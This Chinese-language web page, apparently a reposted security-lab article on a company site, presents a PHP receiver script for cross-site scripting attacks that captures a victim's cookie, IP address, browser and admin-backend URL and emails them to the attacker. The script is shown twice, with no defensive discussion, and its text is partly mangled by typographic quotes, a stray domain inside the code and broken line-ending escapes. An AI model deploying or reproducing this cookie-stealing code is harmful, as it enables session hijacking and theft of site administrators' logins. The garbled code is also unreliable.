企业资讯
- 企业新闻
- 行业文章

XSS获取远程路径并发送到邮件

 &lt;?php $ip = $_SERVER['REMOTE_ADDR']; $to=’webmaster[at]91ri.org’; $referer = $_SERVER['HTTP_REFERER']; $cookie = $_GET['c']; $agent = $_SERVER['HTTP_USER_AGENT']; $subject=’远程XSS获取地址-域名：’.$referer; $body=”&lt;p&gt; 远程管理员IP= “.$ip.”&lt;p&gt; 访问时间=” . date(‘d-m-Y’). “&lt;p&gt; 后台地址=”.$referer.”&lt;p&gt; 浏览器类型=”.$agent.”&lt;p&gt; 当前页面地址=”.$referer.”&lt;p&gt; COOKIE信息=”.$cookie.’&amp;nbsp;’. $headers= ‘MIME-Version: 1.0′ . “rn”; www.91ri.org $headers.= ‘Content-type: text/html; charset=utf-8′ . “rn”;$headers.=”Cleanreport.com”; mail($to, $subject, $body, $headers); ?&gt;

<?php

$ip = $_SERVER[‘REMOTE_ADDR’];

$to=‘webmaster[at]91ri.org’;

$referer = $_SERVER[‘HTTP_REFERER’];

$cookie = $_GET[‘c’];

$agent = $_SERVER[‘HTTP_USER_AGENT’];

$subject=‘远程XSS获取地址-域名：’.$referer;

$body=“ 远程管理员IP= “.$ip.“ 访问时间=” . date(‘d-m-Y’).

“ 后台地址=”.$referer.“ 浏览器类型=”.$agent.“ 当前页面地址=”.$referer.“ COOKIE信息=”.$cookie.‘&nbsp;’.

$headers= ‘MIME-Version: 1.0′ . “rn”; www.91ri.org

$headers.= ‘Content-type: text/html; charset=utf-8′ . “rn”;$headers.=“Cleanreport.com”;

mail($to, $subject, $body, $headers);

本文摘自Shine的圣天堂由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.

鸿大千秋网站建设团队敬上